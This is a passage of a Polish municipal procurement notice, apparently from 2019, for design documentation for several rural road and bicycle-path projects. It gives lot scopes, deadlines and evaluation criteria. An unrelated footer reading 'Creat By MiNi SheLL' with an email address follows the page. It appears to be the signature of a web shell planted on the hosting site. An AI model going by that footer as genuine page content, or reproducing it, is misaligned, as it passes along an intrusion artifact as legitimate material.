Wykonawcy - w przypadku ustawowej zmiany stawki podatku VAT, lub gdy istnieje obiektywna konieczność wprowadzenia zmian, tj. gdy spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby Wykonawcy rażącą stratą w rozumieniu art. 3571 kodeksu cywilnego oraz zmiana wynika z okoliczności, których nie można było przewiedzieć w momencie zawarcia umowy, pod warunkiem przedłożenia Zamawiającemu pisemnego uzasadnienia konieczności wprowadzenia zmiany oraz wyrażenia zgody przez Zamawiającego na tę zmianę.3. Zmiany mogą dotyczyć zmiany sposobu i terminu płatności - w przypadku, gdy konieczność takiej zmiany wynika z okoliczności, których nie można było przewidzieć w momencie zawarcia umowy lub zmiana ta jest korzystna dla Zamawiającego, pod warunkiem przedłożenia Zamawiającemu pisemnego uzasadnienia konieczności wprowadzenia zmiany oraz wyrażenia zgody przez Zamawiającego na tę zmianę.4. Zmiany mogą dotyczyć zmiany osób Wykonawcy uczestniczących w wykonywaniu zamówienia. Zmiana może nastąpić w przypadku gdy konieczność takiej zmiany wynika z okoliczności, których nie można było przewidzieć w momencie zawarcia umowy lub zmiana ta jest korzystna dla Zamawiającego, pod warunkiem przedłożenia Zamawiającemu pisemnego uzasadnienia konieczności wprowadzenia zmiany ze wskazaniem innych osób legitymujących się co najmniej równoważnymi uprawnieniami, o których mowa w ustawie Prawo budowlane lub innych przepisach oraz wyrażenia zgody przez Zamawiającego na tę zmianę.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-04-23</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Opracowanie dokumentacji projektowych pn.: 1. Remont drogi gminnej Nr G22 w m-ci Brzezie. 2. Przebudowa drogi wewnętrznej w m. Podklucze. 3. Przebudowa drogi wewnętrznej w m. Grudna </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Opracowanie dokumentacji projektowych pn.: 1. Remont drogi gminnej Nr G22 w m-ci Brzezie o dł, ok. 680mb. Podziały działek - ok 48szt. 2. Przebudowa drogi wewnętrznej w m. Podklucze o dł. ok 650mb. Podziały działek - ok 33szt. 3. Przebudowa drogi wewnętrznej w m. Grudna o dł. ok. 650mb. Podziały działek - ok 21szt. Wykonanie dokumentacji projektowo-kosztorysowej obejmuje:1. Uregulowanie pasa drogowego budowanej/rozbudowywanej drogi.2. Ulepszenie nawierzchni jezdni, wzmocnienie konstrukcji lub zastosowanie innych powszechnie stosowanych rozwiązań. Jednostka projektowania zaproponuje wariant wzmocnienia nawierzchni jezdni wraz z podaniem między innymi: szczegółowej technologii wykonania, trwałości konstrukcji.4. Budowa zjazdów (indywidualnych, publicznych) do działek przyległych do pasa drogowego, Jednostka projektowania uzgodni lokalizację zjazdów z właścicielami terenu przyległego do projektowanego pasa drogowego.5. Budowa zjazdów publicznych poprzez zaprojektowanie wlotów w istniejące drogi wewnętrzne, zwiększenie bezpieczeństwa poprzez prawidłowe przeprojektowanie wlotów dróg wewnętrznych.6. Budowa odwodnienia układu drogowego - częściowo (w rejonie skrzyżowań i miejscach trudnych z uwagi na istniejącą infrastrukturą) w postaci kanalizacji deszczowej, częściowo w postaci rowów przydrożnych umocnionych i nieumocnionych, budowa odprowadzenia wód deszczowych do odbiorników wód (Jednostka projektowania ma w swoim zakresie doprowadzenie wód deszczowych do np.: zbiornika istniejącego, wybudowanie nowego zbiornika, kanału, rowu melioracyjnego itp. łącznie z zaprojektowanie budowy/przebudowy urządzeń i obiektów wodnych), Jednostka projektowania winna przeanalizować obszar w bezpośrednim sąsiedztwie przedmiotowej drogi i wybrać najbardziej optymalne rozwiązanie.7. Rozwiązanie wszystkich niezbędnych kolizji (odrębne opracowania - wydzielenie z danej branży w podziale na właścicieli kolidujących obiektów).8. Budowa/przebudowa przepustów pod drogą.9. Zabezpieczenie istniejącej infrastruktury.10. Inwentaryzacja drzewostanu do usunięcia (odrębne opracowanie) jeżeli jest wymagane.11. Wykonanie projektu docelowej organizacji ruchu.12. Wykonanie podziału działek pod poszerzenie (wydzielenie) pasa drogowego, który będzie stanowić załącznik do wniosku o wydanie decyzji ZRID. Zakres wydzielenia pasa drogowego winien zawierać również teren pod infrastrukturę projektowaną będącą również wynikiem rozwiązania zaistniałych kolizji. Dokładna ilość działek zostanie określona na etapie sporządzania map d/c projektowych.Pozostałe warunki ogólne:1. Prace projektowe należy przeprowadzić w oparciu o ustawę z 10 kwietnia 2003r o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (Dz. U. z 2003r. Nr 80 poz. 721). 2. Pozyskanie niezbędnych decyzji administracyjnych, a w szczególności pozwolenia wodno-prawnego jeżeli przepisy będą wymagały jego sporządzenia (operat wodnoprawny jest integralna częścią dokumentacji projektowej), decyzji zarządcy drogi oraz pozostałych wynikających z przepisów szczegółowych.3. Pozyskanie niezbędnych uzgodnień, warunków technicznych i opinii, zezwoleń na realizację inwestycji drogowej,4. Wykonanie badań geotechnicznych dla zadań.5. Wykonanie kompletnej dokumentacji projektowej w szczególności: projektów budowalnych, projektów wykonawczych, specyfikacji technicznych, przedmiarów robót, kosztorysów inwestorskich w podziale na poszczególne branże.6. Kompletne dokumentacje dotyczące ewentualnych kolizji z obiektami i sieciami.7. Mapa do celów projektowych - do wykonania po stronie Jednostki projektowania. Mapy do celów projektowych po ich zatwierdzeniu w Starostwie Powiatowym w Bełchatowie Jednostka projektowania przekaże w 1 egz. w wersji papierowej oraz 1 egz. wersji elektronicznej Zamawiającemu.8. Projekty techniczne winny być opracowane w sposób umożliwiający zrealizowanie zamierzenia z uwzględnieniem rodzaju i asortymentu materiałów koniecznych do wbudowania i uzyskania najwyższej jakości dróg i infrastruktury technicznej w oparciu o obowiązujące w tym zakresie normy i przepisy szczegółowe.9. Przed złożeniem oferty należy zapoznać się z zakresem prac projektowych, ewentualnej wizji w terenie i na tej podstawie złożyć dopiero ofertę.10. Wykonanie dokumentacji projektowej rozwiązującej zaistniałe kolizje z istniejącym uzbrojeniem, a niezbędne do wykonania prawidłowo zadania leży po stronie Jednostki projektowania.11. Kompletną dokumentację projektową w zakresie projektów budowlanych, projektów wykonawczych, operatów wodnoprawnych itp. w podziale na poszczególne branże i operatorów sieci (w zakresie kolizji) - po 6 egz. jeżeli zajdzie taka potrzeba.12. Kosztorysy inwestorskie w podziale na poszczególne branże i operatorów sieci (w zakresie kolizji) - po 2 egz. W przypadku nie ogłoszenia przetargu na wykonanie robót objętych przedmiotowymi dokumentacjami projektowymi w przeciągu 6 miesięcy od daty protokólarnego przekazania przedmiotu zamówienia Jednostka projektowania jest zobowiązana na wniosek Inwestora przez okres 18 miesięcy od daty przekazania niniejszych kosztorysów do przeliczenia (zaktualizowania cen) przekazanych kosztorysów inwestorskich i dostarczenia Zamawiającemu w 2 egz..13. Przedmiary robót (kosztorysy ślepe) w podziale na poszczególne branże i operatorów sieci (w zakresie kolizji) - po 2 egz.14. Kompletną specyfikację techniczną odbioru i wykonania robót w podziale na poszczególne branże i operatorów sieci (w zakresie kolizji) - po 2 egz15. Wersję elektroniczną (edytowalna i nieedytowalną) kompletnej dokumentacji projektowej wraz z kosztorysami, specyfikacjami, wszystkimi uzgodnieniami, opiniami, decyzjami, zezwoleniami i opracowaniami w podziale na poszczególne branże i operatorów sieci (w zakresie kolizji) - po 3 egz. na płycie CD-R (kompletna wersja elektroniczna(nieedytowalna) w formacie PDF winna być możliwa do wydruku w skali oraz rysunki w formacie DWG). 16. Jednostka projektowa będzie zobowiązana do udziału w trakcie prowadzonego przez Zamawiającego postępowaniu przetargowym na wyłonienie Wykonawcy robót budowlanych (m.in. niezwłoczne udzielanie wyjaśnień do SIWZ).17. Dokumentacja projektowa wraz ze wszystkimi jej elementami (m.in.: kosztorysami i specyfikacjami technicznymi) winna spełniać wymogi ustawy o zamówieniach publicznych. Jednostka projektowania w dokumentacji projektowej zawrze szczegółowe informacje co do wszystkich istotnych parametrów zastosowanych materiałów i urządzeń. Należy podać minimalne wymagane parametry równoważności zastosowanych materiałów.18. Pozyskanie niezbędnych decyzji administracyjnych (np.: decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia, pozwolenia wodno-prawnego, decyzji wydawanych przez zarządcę drogi będącej przedmiotem zamówienia itp.) wymagane przepisami szczegółowymi, wszystkich niezbędnych opinii, uzgodnień i pozwoleń leży po stronie Jednostki projektowania.19. Prace projektowe należy przeprowadzić w oparciu o Ustawę Prawo budowlane oraz Ustawę Prawo zamówień publicznych. W dokumentacji projektowej Jednostka projektowania zastosowane materiały opisze parametrami technicznymi bez podawania znaków towarowych bądź wskazania na konkretnych producentów. Niezastosowanie się do niniejszego skutkować będzie potraktowanie przez Zamawiającego wykonanej dokumentacji projektowej jako niezgodna z umową i wezwanie do doprowadzenia przedmiotu umowy do stanu zgodnego z zawartą umową.20. Pełnienie nadzoru autorskiego podczas wykonywania robót objętych projektem. 21. Wykonanie dokumentacji projektowej w sposób umożliwiający zrealizowanie zamierzenia z uwzględnieniem rodzaju i asortymentu materiałów koniecznych do wbudowania i uzyskania najwyższej jakości infrastruktury w oparciu o obowiązujące w tym zakresie normy i przepisy szczegółowe z Ustawą prawo zamówień publicznych włącznie. 22. Pozyskanie niezbędnych decyzji administracyjnych wymaganych przepisami szczegółowymi, wszystkich niezbędnych opinii, uzgodnień i pozwoleń leży po stronie Jednostki projektowania,23. Niezwłoczne udzielanie odpowiedzi i wyjaśnień dotyczących dokumentacji projektowej w trakcie prowadzonego przez Zamawiającego postępowania przetargowego na wyłonienie Wykonawcy robót budowlanych.24. Uczestnictwo w naradach koordynacyjnych na etapie prac projektowych i jeżeli będzie taka konieczność na etapie realizacji inwestycji na wezwanie Zamawiającego bez dodatkowego wynagrodzenia.25. Uzupełnianie dokumentacji projektowej w zakresie związanym z ewentualnymi brakami wcześniej wykonanej dokumentacji oraz wyjaśnienie wątpliwości powstałych w toku realizacji inwestycji.26. Wprowadzanie do dokumentacji wszelkich zmian, jeżeli wynikają one z wad opracowań przygotowanych przez Jednostkę projektowania lub osoby, którymi się posługuje. Opracowanie dokumentacji projektowych pn.: 1. Remont drogi gminnej Nr G22 w m-ci Brzezie. 2. Przebudowa drogi wewnętrznej w m. Podklucze 3. Przebudowa drogi wewnętrznej w m. Grudna <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>71220000-6, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-12-20<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Doświadczenie Głównego Projektanta branży drogowej</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Opracowanie dokumentacji projektowych pn.: 1. Koncepcja projektu drogowego oraz ścieżki rowerowej - Sołectwo Stanisławów Pierwszy 2. Przebudowa drogi w m-ci Zagadki 3. Budowa drogi wewnętrznej Żabczanka-Podżar</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Opracowanie dokumentacji projektowych pn.: 1. Koncepcja projektu drogowego oraz ścieżki rowerowej - Sołectwo Stanisławów Pierwszy o dł. ok 2850mb. 2. Przebudowa drogi w m-ci Zagadki o dł. 560mb. 3. Budowa drogi wewnętrznej Żabczanka-Podżar o dł. ok 700mb. Wykonanie dokumentacji projektowo-kosztorysowej obejmuje:1. Ulepszenie nawierzchni jezdni, wzmocnienie konstrukcji lub zastosowanie innych powszechnie stosowanych rozwiązań. Jednostka projektowania zaproponuje wariant wzmocnienia nawierzchni jezdni wraz z podaniem między innymi: szczegółowej technologii wykonania, trwałości konstrukcji.2. Budowa/przebudowa przepustów pod drogą.3. Pozyskanie niezbędnych uzgodnień, warunków technicznych i opinii, zezwoleń w celu uzyskania pozwolenia na budowę lub zgłoszenia nie wymagającego pozwolenia na budowę.4. Wykonanie badań geotechnicznych dla zadania.5. Wykonanie kompletnej dokumentacji projektowej w szczególności: projektów budowalnych, projektów wykonawczych, specyfikacji technicznych, przedmiarów robót, kosztorysów inwestorskich.6. Mapa do celów projektowych - do wykonania po stronie Jednostki projektowania. Mapy do celów projektowych po ich zatwierdzeniu w Starostwie Powiatowym w Bełchatowie Jednostka projektowania przekaże w 1 egz. w wersji papierowej oraz 1 egz. wersji elektronicznej Zamawiającemu.7. Projekty techniczne winny być opracowane w sposób umożliwiający zrealizowanie zamierzenia z uwzględnieniem rodzaju i asortymentu materiałów koniecznych do wbudowania i uzyskania najwyższej jakości dróg i infrastruktury technicznej w oparciu o obowiązujące w tym zakresie normy i przepisy szczegółowe.8. Przed złożeniem oferty należy zapoznać się z zakresem prac projektowych, ewentualnej wizji w terenie i na tej podstawie złożyć dopiero ofertę.9. Kompletną dokumentację projektową w zakresie projektów budowlanych, projektów wykonawczych, zecyzji zwalniających. 10. Kosztorysy inwestorskie w podziale na poszczególne branże i operatorów sieci (w zakresie kolizji) - po 2 egz. W przypadku nie ogłoszenia przetargu na wykonanie robót objętych przedmiotowymi dokumentacjami projektowymi w przeciągu 6 miesięcy od daty protokólarnego przekazania przedmiotu zamówienia Jednostka projektowania jest zobowiązana na wniosek Inwestora przez okres 18 miesięcy od daty przekazania niniejszych kosztorysów do przeliczenia (zaktualizowania cen) przekazanych kosztorysów inwestorskich i dostarczenia Zamawiającemu w 2 egz..11. Przedmiary robót (kosztorysy ślepe) w podziale na poszczególne branże i operatorów sieci (w zakresie kolizji) - po 2 egz.12. Kompletną specyfikację techniczną odbioru i wykonania robót - 2 egz.13. Wersję elektroniczną (edytowalna i nieedytowalną) kompletnej dokumentacji projektowej wraz z kosztorysami, specyfikacjami, wszystkimi uzgodnieniami, opiniami, decyzjami, zezwoleniami i opracowaniam - 1 egz. na płycie CD-R (kompletna wersja elektroniczna(nieedytowalna) w formacie PDF winna być możliwa do wydruku w skali oraz rysunki w formacie DWG). 14. Jednostka projektowa będzie zobowiązana do udziału w trakcie prowadzonego przez Zamawiającego postępowaniu przetargowym na wyłonienie Wykonawcy robót budowlanych (m.in. niezwłoczne udzielanie wyjaśnień do SIWZ).15. Dokumentacja projektowa wraz ze wszystkimi jej elementami (m.in.: kosztorysami i specyfikacjami technicznymi) winna spełniać wymogi ustawy o zamówieniach publicznych. Jednostka projektowania w dokumentacji projektowej zawrze szczegółowe informacje co do wszystkich istotnych parametrów zastosowanych materiałów i urządzeń. Należy podać minimalne wymagane parametry równoważności zastosowanych materiałów.16. Prace projektowe należy przeprowadzić w oparciu o Ustawę Prawo budowlane oraz Ustawę Prawo zamówień publicznych. W dokumentacji projektowej Jednostka projektowania zastosowane materiały opisze parametrami technicznymi bez podawania znaków towarowych bądź wskazania na konkretnych producentów. Niezastosowanie się do niniejszego skutkować będzie potraktowanie przez Zamawiającego wykonanej dokumentacji projektowej jako niezgodna z umową i wezwanie do doprowadzenia przedmiotu umowy do stanu zgodnego z zawartą umową.17. Pełnienie nadzoru autorskiego podczas wykonywania robót objętych projektem. 18. Wykonanie dokumentacji projektowej w sposób umożliwiający zrealizowanie zamierzenia z uwzględnieniem rodzaju i asortymentu materiałów koniecznych do wbudowania i uzyskania najwyższej jakości infrastruktury w oparciu o obowiązujące w tym zakresie normy i przepisy szczegółowe z Ustawą prawo zamówień publicznych włącznie. 19. Pozyskanie niezbędnych decyzji administracyjnych wymaganych przepisami szczegółowymi, wszystkich niezbędnych opinii, uzgodnień i pozwoleń leży po stronie Jednostki projektowania,20. Niezwłoczne udzielanie odpowiedzi i wyjaśnień dotyczących dokumentacji projektowej w trakcie prowadzonego przez Zamawiającego postępowania przetargowego na wyłonienie Wykonawcy robót budowlanych.21. Uczestnictwo w naradach koordynacyjnych na etapie prac projektowych i jeżeli będzie taka konieczność na etapie realizacji inwestycji na wezwanie Zamawiającego bez dodatkowego wynagrodzenia.22. Uzupełnianie dokumentacji projektowej w zakresie związanym z ewentualnymi brakami wcześniej wykonanej dokumentacji oraz wyjaśnienie wątpliwości powstałych w toku realizacji inwestycji.23. Wprowadzanie do dokumentacji wszelkich zmian, jeżeli wynikają one z wad opracowań przygotowanych przez Jednostkę projektowania lub osoby, którymi się posługuje. Opracowanie dokumentacji projektowych pn.: 1. Koncepcja projektu drogowego oraz ścieżki rowerowej - Sołectwo Stanisławów Pierwszy 2. Przebudowa drogi w m-ci Zagadki 3. Budowa drogi wewnętrznej Żabczanka-Podżar<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>71220000-6, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-10-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Doświadczenie Głównego Projektanta branży drogowej</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com